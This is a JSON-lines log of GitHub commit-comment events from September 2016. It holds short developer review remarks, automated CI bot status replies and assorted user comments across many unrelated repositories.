{"id":"4536398365","type":"CommitCommentEvent","actor":{"login":"tzerrell"},"repo":{"name":"MoreEventsMod/More_Events_Mod_Beta"},"payload":{"comment":{"id":18952151,"position":null,"line":null,"path":null,"commit_id":"1fad449c167a46e95457b4b78a5ed364bb4b95e8","created_at":"2016-09-08T20:18:27Z","updated_at":"2016-09-08T20:18:27Z","body":"If this is intentional I have no objections at all. Indeed the explanation you give sounds really cool. I just wanted to make sure it wasn't a mistake :)"}},"created_at":"2016-09-08T20:18:27Z"}
{"id":"4536398905","type":"CommitCommentEvent","actor":{"login":"zsarsam"},"repo":{"name":"janrain/jump.ios"},"payload":{"comment":{"id":18952154,"position":null,"line":null,"path":null,"commit_id":"8fd5f940e0f4a15e94ffc7bbd46593076bc55ceb","created_at":"2016-09-08T20:18:34Z","updated_at":"2016-09-08T20:18:34Z","body":"The tag is not exist repo "}},"created_at":"2016-09-08T20:18:34Z"}
{"id":"4536399831","type":"CommitCommentEvent","actor":{"login":"mbuttler"},"repo":{"name":"wesbos/es6-articles"},"payload":{"comment":{"id":18952156,"position":null,"line":null,"path":null,"commit_id":"10abf63a60b9b61b03df87b7f21469a16d267a1a","created_at":"2016-09-08T20:18:43Z","updated_at":"2016-09-08T20:18:43Z","body":"![http://i.giphy.com/hURsrHYlao1Ko.gif](http://i.giphy.com/hURsrHYlao1Ko.gif)"}},"created_at":"2016-09-08T20:18:43Z"}
{"id":"4536401377","type":"CommitCommentEvent","actor":{"login":"TheOfficialFloW"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18952163,"position":null,"line":null,"path":null,"commit_id":"2b79149cdc2b2bdecb971d35b70d547910faef72","created_at":"2016-09-08T20:19:01Z","updated_at":"2016-09-08T20:19:01Z","body":"I have tested it with the newest colors.txt file"}},"created_at":"2016-09-08T20:19:01Z"}
{"id":"4536402668","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":18952166,"position":20,"line":null,"path":"src/Parsers/Csv.php","commit_id":"b71fc323e748deb2b77465eb58d50e2b4c351b52","created_at":"2016-09-08T20:19:16Z","updated_at":"2016-09-08T20:19:16Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-08T20:19:16Z"}
{"id":"4536405741","type":"CommitCommentEvent","actor":{"login":"danielmdesigns"},"repo":{"name":"danielmdesigns/ec-emails-2016"},"payload":{"comment":{"id":18952181,"position":null,"line":null,"path":null,"commit_id":"bea4ea147b53188a933c3ed9b6c0a44ae8bb7d34","created_at":"2016-09-08T20:19:52Z","updated_at":"2016-09-08T20:19:52Z","body":"```tel``` would change punctuation symbols on mobile. reverted back to a plain ol' dash.\r\n\r\nadd ```max-width:600px``` to fix 3col grid breaking on 2007, 2010, 2013, and 2016 Outlook"}},"created_at":"2016-09-08T20:19:52Z"}
{"id":"4536410419","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952201,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:20:45Z","updated_at":"2016-09-08T20:20:45Z","body":"@CPSC310Bot #d2"}},"created_at":"2016-09-08T20:20:45Z"}
{"id":"4536410519","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952202,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:20:47Z","updated_at":"2016-09-08T20:20:47Z","body":"Request received; should be processed within 2 minutes.\nNote: No/Invalid deliverable specified, using latest."}},"created_at":"2016-09-08T20:20:47Z"}
{"id":"4536413920","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952218,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:21:25Z","updated_at":"2016-09-08T20:21:25Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:21:25Z"}
{"id":"4536414287","type":"CommitCommentEvent","actor":{"login":"BigBoot"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18952219,"position":null,"line":null,"path":null,"commit_id":"2b79149cdc2b2bdecb971d35b70d547910faef72","created_at":"2016-09-08T20:21:30Z","updated_at":"2016-09-08T20:21:30Z","body":"Yep I see it, I'll take a look"}},"created_at":"2016-09-08T20:21:30Z"}
{"id":"4536415217","type":"CommitCommentEvent","actor":{"login":"mfrasca"},"repo":{"name":"RoDuth/ghini.desktop"},"payload":{"comment":{"id":18952226,"position":null,"line":null,"path":null,"commit_id":"eb37945e35dcf7f4fccf2e121cbf05f13d622336","created_at":"2016-09-08T20:21:40Z","updated_at":"2016-09-08T20:21:40Z","body":"let me know when you are done with this NSIS issue, so I can cherry-pick your work and include it in the published line. if you want, you could add this text in your commits that are related to the issues:\r\nGhini/ghini.desktop#126\r\nGhini/ghini.desktop#109\r\nif you do that, github will help the readers relate commits to issues.\r\n"}},"created_at":"2016-09-08T20:21:40Z"}
{"id":"4536422741","type":"CommitCommentEvent","actor":{"login":"coldnebo"},"repo":{"name":"coldnebo/data_hut"},"payload":{"comment":{"id":18952245,"position":null,"line":null,"path":null,"commit_id":"7b2b713820d087d583e1b4fc72d0c7ce7b119156","created_at":"2016-09-08T20:23:02Z","updated_at":"2016-09-08T20:23:02Z","body":"fixes #2 "}},"created_at":"2016-09-08T20:23:02Z"}
{"id":"4536432603","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952282,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:24:50Z","updated_at":"2016-09-08T20:24:50Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:24:50Z"}
{"id":"4536432708","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952283,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:24:51Z","updated_at":"2016-09-08T20:24:51Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-08T20:24:51Z"}
{"id":"4536433700","type":"CommitCommentEvent","actor":{"login":"dancingshell"},"repo":{"name":"fabien/lb-connector-mandrill"},"payload":{"comment":{"id":18952291,"position":5,"line":140,"path":"lib/mandrill.js","commit_id":"730b88f8a7f6f80bcc88d99e4aaa40321f62d9ce","created_at":"2016-09-08T20:25:03Z","updated_at":"2016-09-08T20:25:03Z","body":"@fabien thanks, what did you choose to use instead if you don't mind me asking?"}},"created_at":"2016-09-08T20:25:03Z"}
{"id":"4536436117","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952297,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:25:30Z","updated_at":"2016-09-08T20:25:30Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:25:30Z"}
{"id":"4536436205","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18952298,"position":null,"line":null,"path":null,"commit_id":"7d96594c33f82d3753e45e13eb37fc8a07a8af29","created_at":"2016-09-08T20:25:31Z","updated_at":"2016-09-08T20:25:31Z","body":"The bug was spotted due bomb testing, in CTF bot orders were immediately overwritten (a bot always was an attacker or a defender), in bomb defence spots might be removed without any replancement."}},"created_at":"2016-09-08T20:25:31Z"}
{"id":"4536438233","type":"CommitCommentEvent","actor":{"login":"ericwa"},"repo":{"name":"kduske/TrenchBroom"},"payload":{"comment":{"id":18952303,"position":28,"line":45,"path":"common/src/Model/CollectTouchingNodesVisitor.h","commit_id":"bf0dcc4c029aacdcb6810f98209c35478ad2863c","created_at":"2016-09-08T20:25:54Z","updated_at":"2016-09-08T20:25:54Z","body":"Typo in `(*cur)ma->intersects(node)` ? I get a syntax error here"}},"created_at":"2016-09-08T20:25:54Z"}
{"id":"4536438476","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952304,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:25:57Z","updated_at":"2016-09-08T20:25:57Z","body":"@CPSC310Bot #d1"}},"created_at":"2016-09-08T20:25:57Z"}
{"id":"4536438576","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952306,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:25:58Z","updated_at":"2016-09-08T20:25:58Z","body":"Request received; should be processed within 2 minutes."}},"created_at":"2016-09-08T20:25:58Z"}
{"id":"4536439813","type":"CommitCommentEvent","actor":{"login":"hgonzalez94"},"repo":{"name":"Maximus-/Grove"},"payload":{"comment":{"id":18952309,"position":null,"line":null,"path":null,"commit_id":"8fefefcea0f286671b6643b3319e6c6d89c0bcfe","created_at":"2016-09-08T20:26:12Z","updated_at":"2016-09-08T20:26:12Z","body":"adorbs <3 <3 k@w@ii "}},"created_at":"2016-09-08T20:26:12Z"}
{"id":"4536440691","type":"CommitCommentEvent","actor":{"login":"CobaltWolf"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":18952313,"position":null,"line":null,"path":null,"commit_id":"98475a2cf0831f6d2dd8e60214079f3dbcd2fe20","created_at":"2016-09-08T20:26:21Z","updated_at":"2016-09-08T20:26:21Z","body":"@jsolson this also includes a version without the fairing shells, to use as a fairing base. The Y value for that upper surface is -2"}},"created_at":"2016-09-08T20:26:21Z"}
{"id":"4536441897","type":"CommitCommentEvent","actor":{"login":"abdulsamad786"},"repo":{"name":"zaincbs/PYTECH"},"payload":{"comment":{"id":18952317,"position":5,"line":11,"path":"cat.py","commit_id":"d2a45ddc5c8948883eafeddfe40a3253f72df877","created_at":"2016-09-08T20:26:34Z","updated_at":"2016-09-08T20:26:34Z","body":"Done"}},"created_at":"2016-09-08T20:26:34Z"}
{"id":"4536442343","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952318,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:26:39Z","updated_at":"2016-09-08T20:26:39Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:26:39Z"}
{"id":"4536445815","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952325,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:27:18Z","updated_at":"2016-09-08T20:27:18Z","body":"@CPSC310Bot #d3"}},"created_at":"2016-09-08T20:27:18Z"}
{"id":"4536445940","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952326,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:27:19Z","updated_at":"2016-09-08T20:27:19Z","body":"Request received; should be processed within 2 minutes.\nNote: Invalid deliverable specified, using latest."}},"created_at":"2016-09-08T20:27:19Z"}
{"id":"4536450177","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952340,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:28:01Z","updated_at":"2016-09-08T20:28:01Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:28:01Z"}
{"id":"4536451382","type":"CommitCommentEvent","actor":{"login":"jonathanccalixto"},"repo":{"name":"eltonsantos/pundit-app-advanced"},"payload":{"comment":{"id":18952345,"position":3,"line":3,"path":"app/controllers/managers_controller.rb","commit_id":"c0a70b1f6da75c7acb7fda0c5131ff46183d9278","created_at":"2016-09-08T20:28:16Z","updated_at":"2016-09-08T20:28:16Z","body":"não acho esta abordagem legal, pois não existe uma action \"all\". O pundit usa o padrão do rails para crud que é index(lista), edit/update, new/create, show e destroy, o interessante é usar isso. Se tem alguma regra que é compartilhada, pode ser tratado nos policies do próprio pundit."}},"created_at":"2016-09-08T20:28:16Z"}
{"id":"4536451948","type":"CommitCommentEvent","actor":{"login":"bcgit"},"repo":{"name":"bcgit/bc-java"},"payload":{"comment":{"id":18952349,"position":null,"line":null,"path":null,"commit_id":"b5e2855773858bed46761a84c215bab7df6abe23","created_at":"2016-09-08T20:28:21Z","updated_at":"2016-09-08T20:28:21Z","body":"Thanks, it's reversed, I've added an extra comment to the test outlining the issue with the RFC. I note you've already posted an errata on this. Changes should show up shortly."}},"created_at":"2016-09-08T20:28:21Z"}
{"id":"4536453166","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952355,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:28:35Z","updated_at":"2016-09-08T20:28:35Z","body":"@CPSC310Bot"}},"created_at":"2016-09-08T20:28:35Z"}
{"id":"4536453261","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952356,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:28:36Z","updated_at":"2016-09-08T20:28:36Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-08T20:28:36Z"}
{"id":"4536453811","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952359,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:28:42Z","updated_at":"2016-09-08T20:28:42Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:28:42Z"}
{"id":"4536453853","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952360,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:28:43Z","updated_at":"2016-09-08T20:28:43Z","body":"Request is already queued for processing."}},"created_at":"2016-09-08T20:28:43Z"}
{"id":"4536455743","type":"CommitCommentEvent","actor":{"login":"wesbos"},"repo":{"name":"wesbos/es6-articles"},"payload":{"comment":{"id":18952368,"position":null,"line":null,"path":null,"commit_id":"10abf63a60b9b61b03df87b7f21469a16d267a1a","created_at":"2016-09-08T20:29:05Z","updated_at":"2016-09-08T20:29:05Z","body":"lol I added this part in after - totally my fault"}},"created_at":"2016-09-08T20:29:05Z"}
{"id":"4536456570","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952370,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:29:15Z","updated_at":"2016-09-08T20:29:15Z","body":"6 passing, 3 failing\nName of first spec to fail: Echo Service Should be able to echo "}},"created_at":"2016-09-08T20:29:15Z"}
{"id":"4536457992","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952378,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:29:31Z","updated_at":"2016-09-08T20:29:31Z","body":"@CPSC310Bot "}},"created_at":"2016-09-08T20:29:31Z"}
{"id":"4536458169","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952379,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:29:33Z","updated_at":"2016-09-08T20:29:33Z","body":"Request cannot be processed. Rate limit exceeded; please wait 43181728ms before trying again."}},"created_at":"2016-09-08T20:29:33Z"}
{"id":"4536458199","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18952380,"position":null,"line":null,"path":null,"commit_id":"148b0500c37976d59623ef18ce172a49d32bc8d5","created_at":"2016-09-08T20:29:34Z","updated_at":"2016-09-08T20:29:34Z","body":"ova zadaca je ok !\r\n\r\nbravo"}},"created_at":"2016-09-08T20:29:34Z"}
{"id":"4536461070","type":"CommitCommentEvent","actor":{"login":"ginibeagha"},"repo":{"name":"ginibeagha/Django1"},"payload":{"comment":{"id":18952390,"position":1,"line":1,"path":"Django1_9","commit_id":"2f17c98b613fe0025ed8e289b57b874a87c7d480","created_at":"2016-09-08T20:30:08Z","updated_at":"2016-09-08T20:30:08Z","body":"trial"}},"created_at":"2016-09-08T20:30:08Z"}
{"id":"4536463505","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18952400,"position":null,"line":null,"path":null,"commit_id":"6c0319fa685fecb14fe5815baa94ade2d7e48131","created_at":"2016-09-08T20:30:34Z","updated_at":"2016-09-08T20:30:34Z","body":"EMS (brianlball) - i386-Windows-7-VisualStudio-12: OK (2309 of 2466 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c0319fa685fecb14fe5815baa94ade2d7e48131-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T20:30:34Z"}
{"id":"4536465210","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952408,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:30:54Z","updated_at":"2016-09-08T20:30:54Z","body":"@CPSC310Bot @cpsc310bot"}},"created_at":"2016-09-08T20:30:54Z"}
{"id":"4536465310","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":18952409,"position":null,"line":null,"path":null,"commit_id":"278ecf9588435f21a707698d6affa72c1d402206","created_at":"2016-09-08T20:30:55Z","updated_at":"2016-09-08T20:30:55Z","body":"Request cannot be processed. Rate limit exceeded; please wait 43100483ms before trying again."}},"created_at":"2016-09-08T20:30:55Z"}
{"id":"4536468343","type":"CommitCommentEvent","actor":{"login":"piedoom"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952423,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:31:28Z","updated_at":"2016-09-08T20:31:28Z","body":"That's pretty clever.  I like it."}},"created_at":"2016-09-08T20:31:28Z"}
{"id":"4536470769","type":"CommitCommentEvent","actor":{"login":"marijnvdwerf"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18952431,"position":null,"line":null,"path":null,"commit_id":"0cc42380257b1059564c909e2251f04f13a72ea1","created_at":"2016-09-08T20:31:52Z","updated_at":"2016-09-08T20:31:52Z","body":"There are two of these"}},"created_at":"2016-09-08T20:31:52Z"}
{"id":"4536476692","type":"CommitCommentEvent","actor":{"login":"pbjanrain"},"repo":{"name":"janrain/jump.ios"},"payload":{"comment":{"id":18952448,"position":null,"line":null,"path":null,"commit_id":"8fd5f940e0f4a15e94ffc7bbd46593076bc55ceb","created_at":"2016-09-08T20:32:57Z","updated_at":"2016-09-08T20:32:57Z","body":"I'm pretty sure it does:  https://github.com/janrain/jump.ios/releases\r\n\r\n"}},"created_at":"2016-09-08T20:32:57Z"}
{"id":"4536484703","type":"CommitCommentEvent","actor":{"login":"isysd"},"repo":{"name":"f3rnando/gitguild_whitepaper_data"},"payload":{"comment":{"id":18952468,"position":null,"line":null,"path":null,"commit_id":"d20e7ea9ee679a7a09bf8c713c8dc00daa87971a","created_at":"2016-09-08T20:34:24Z","updated_at":"2016-09-08T20:34:24Z","body":"This commit is not signed. Please recreate with `-S` flag\r\n\r\n```\r\ngit commit -S -m \"registering\"\r\n```"}},"created_at":"2016-09-08T20:34:24Z"}
{"id":"4536489392","type":"CommitCommentEvent","actor":{"login":"irth"},"repo":{"name":"room23studios/style-guide"},"payload":{"comment":{"id":18952486,"position":null,"line":null,"path":null,"commit_id":"e71c90a07b514d861b44bbdebc0ee3e5caaeb008","created_at":"2016-09-08T20:35:13Z","updated_at":"2016-09-08T20:35:13Z","body":"tbh i dont care. but my roommates prefer tabs"}},"created_at":"2016-09-08T20:35:13Z"}
{"id":"4536490870","type":"CommitCommentEvent","actor":{"login":"kashmoneygt"},"repo":{"name":"ssood12/M2"},"payload":{"comment":{"id":18952488,"position":null,"line":null,"path":null,"commit_id":"727d541593fae63b5df612f940ff88c2d6cf06c5","created_at":"2016-09-08T20:35:29Z","updated_at":"2016-09-08T20:35:29Z","body":"I was having trouble writing my gradle file, and with the help of Piazza and you, I understood it! So thank you :) "}},"created_at":"2016-09-08T20:35:29Z"}
{"id":"4536493731","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18952501,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T20:36:00Z","updated_at":"2016-09-08T20:36:00Z","body":"Thank you @cescoffier for taking the time to answer all my questions."}},"created_at":"2016-09-08T20:36:00Z"}
{"id":"4536496822","type":"CommitCommentEvent","actor":{"login":"BigBoot"},"repo":{"name":"TheOfficialFloW/VitaShell"},"payload":{"comment":{"id":18952511,"position":null,"line":null,"path":null,"commit_id":"2b79149cdc2b2bdecb971d35b70d547910faef72","created_at":"2016-09-08T20:36:32Z","updated_at":"2016-09-08T20:36:32Z","body":"Dang it I somehow managed to delete my id.dat and had to format my memory card...\r\nAnyway, the problem appears when a file doesn't end with a newline.\r\nI'll look for a fix."}},"created_at":"2016-09-08T20:36:32Z"}
{"id":"4536497498","type":"CommitCommentEvent","actor":{"login":"janisozaur"},"repo":{"name":"OpenRCT2/OpenRCT2"},"payload":{"comment":{"id":18952514,"position":null,"line":null,"path":null,"commit_id":"0cc42380257b1059564c909e2251f04f13a72ea1","created_at":"2016-09-08T20:36:40Z","updated_at":"2016-09-08T20:36:40Z","body":"Thanks, I checked and found two more."}},"created_at":"2016-09-08T20:36:40Z"}
{"id":"4536499675","type":"CommitCommentEvent","actor":{"login":"Calgoat"},"repo":{"name":"Odasacarf/hello-world"},"payload":{"comment":{"id":18952521,"position":null,"line":null,"path":null,"commit_id":"f18a42e0e44a6ff0618a120298902f394e7db488","created_at":"2016-09-08T20:37:05Z","updated_at":"2016-09-08T20:37:05Z","body":":)"}},"created_at":"2016-09-08T20:37:05Z"}
{"id":"4536502986","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952532,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:37:41Z","updated_at":"2016-09-08T20:37:41Z","body":"WHY THE HEL DID TOU TAKE THE UNDERLINE OFF OF LINKS, NO ONE CAN TELL THERE IS A LINK ANYMORE!\r\n"}},"created_at":"2016-09-08T20:37:41Z"}
{"id":"4536505057","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18952541,"position":null,"line":null,"path":null,"commit_id":"83673bc505e75f40793d5dba88c88113f026d555","created_at":"2016-09-08T20:38:03Z","updated_at":"2016-09-08T20:38:03Z","body":"saw approval from javajolt\nat https://github.com/basho/riak_kv/commit/83673bc505e75f40793d5dba88c88113f026d555"}},"created_at":"2016-09-08T20:38:03Z"}
{"id":"4536505123","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18952542,"position":null,"line":null,"path":null,"commit_id":"83673bc505e75f40793d5dba88c88113f026d555","created_at":"2016-09-08T20:38:04Z","updated_at":"2016-09-08T20:38:04Z","body":"merging basho/riak_kv/bugfix_jrd_time-bound-checks = 83673bc5 into borshop-integration-1474-bugfix_jrd_time-bound-checks"}},"created_at":"2016-09-08T20:38:04Z"}
{"id":"4536505159","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18952543,"position":null,"line":null,"path":null,"commit_id":"83673bc505e75f40793d5dba88c88113f026d555","created_at":"2016-09-08T20:38:04Z","updated_at":"2016-09-08T20:38:04Z","body":"basho/riak_kv/bugfix_jrd_time-bound-checks = 83673bc5 merged ok, testing candidate = 6ef22d66"}},"created_at":"2016-09-08T20:38:04Z"}
{"id":"4536507968","type":"CommitCommentEvent","actor":{"login":"Hermanya"},"repo":{"name":"Hermanya/listenable-browser"},"payload":{"comment":{"id":18952553,"position":8,"line":35,"path":"support_for_this_browser.js","commit_id":"c343679059b3123d91c0b6f266bb4dfe96385976","created_at":"2016-09-08T20:38:35Z","updated_at":"2016-09-08T20:38:35Z","body":"@alinz thanks; it does oddly look like a node bug"}},"created_at":"2016-09-08T20:38:35Z"}
{"id":"4536508669","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952556,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:38:42Z","updated_at":"2016-09-08T20:38:42Z","body":"WHY DO I HAVE TO SEE THE SAME BLOGS I DON'T FOLLOW OR WANT TO SEE JUST BECAUSE I CLICKED LIKE ONCE BY ACCIDENT?\r\n\r\n"}},"created_at":"2016-09-08T20:38:42Z"}
{"id":"4536508811","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18952557,"position":134,"line":134,"path":"FoodTracker01/FoodTracker01/MealTableViewController.swift","commit_id":"7b42a0f9809066f4e5a7622d70f9395ff1d69823","created_at":"2016-09-08T20:38:44Z","updated_at":"2016-09-08T20:38:44Z","body":"ok"}},"created_at":"2016-09-08T20:38:44Z"}
{"id":"4536512623","type":"CommitCommentEvent","actor":{"login":"jayjungcy"},"repo":{"name":"jayjungcy/Admin-Scripting"},"payload":{"comment":{"id":18952568,"position":2,"line":2,"path":"README.md","commit_id":"a90529050cb00fde94f8a61eab350c699de02676","created_at":"2016-09-08T20:39:26Z","updated_at":"2016-09-08T20:39:26Z","body":"Write..something"}},"created_at":"2016-09-08T20:39:26Z"}
{"id":"4536514696","type":"CommitCommentEvent","actor":{"login":"rollership"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18952577,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T20:39:50Z","updated_at":"2016-09-08T20:39:50Z","body":"WHY DO YOU HAVE DISEMBODIED BLASTS OF SOUND THAT FORCE US TO RELOAD OUR DASHBOARD?\r\n"}},"created_at":"2016-09-08T20:39:50Z"}
{"id":"4536516229","type":"CommitCommentEvent","actor":{"login":"AnnaMandrik"},"repo":{"name":"AnnaMandrik/95434-code-and-magick"},"payload":{"comment":{"id":18952581,"position":null,"line":null,"path":null,"commit_id":"7666a1657af09a82fa8f0e5e2fdf8b34615050e3","created_at":"2016-09-08T20:40:07Z","updated_at":"2016-09-08T20:40:07Z","body":"Евгений, исправила все по правкам твоим - но проблема осталась - в браузере выдается ошибка что \r\ncreateCallback('http://localhost:1506/api/reviews', function(data) - не определяется. эта переменная есть в load.js но (при том что вроде бы модуль этот подключен сюда) здесь она не определяется. А на мои попытки подключить reviews.createCallback();\r\n +reviews.showFeedback(); - как ты мне написал,\r\nбраузер ругается что это не функция (на оба). И код так и сломан.\r\n"}},"created_at":"2016-09-08T20:40:07Z"}
{"id":"4536517272","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18952583,"position":null,"line":null,"path":null,"commit_id":"7b42a0f9809066f4e5a7622d70f9395ff1d69823","created_at":"2016-09-08T20:40:19Z","updated_at":"2016-09-08T20:40:19Z","body":"ok dobro je to \r\n\r\nsamo posalji jos onaj dodatni zadakat :)"}},"created_at":"2016-09-08T20:40:19Z"}
